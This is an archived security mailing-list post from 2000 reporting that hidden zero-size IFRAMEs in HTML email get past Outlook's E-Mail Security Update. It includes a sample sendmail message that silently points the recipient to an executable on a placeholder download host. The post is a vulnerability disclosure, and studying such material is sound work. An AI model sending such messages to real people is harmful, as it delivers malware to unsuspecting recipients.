OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Circumventing Outlook Security Update File Download Security With IFRAMEs
From: cassiusHUSHMAIL.COM
Date: Fri Jun 09 2000 - 17:33:33 CDT


This is an update to my previous post on malicious URLs and Outlook.
You *can* circumvent the Outlook E-Mail Security Update with IFRAMEs.

Example:

% sendmail outlookuserexample.com
MIME-Version: 1.0
Content-Type: text/html
Subject: Fake Attachment

<html>
<iframe src='http://download.example.com/badfile.exe' height=0 width=0>
</html>"

>.

This will display an IE 'open/download' dialog if the message is viewed
in the preview pane or opened for reading.

So Outlook with the patch is still vulnerable to worms, virii and trojans.

IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.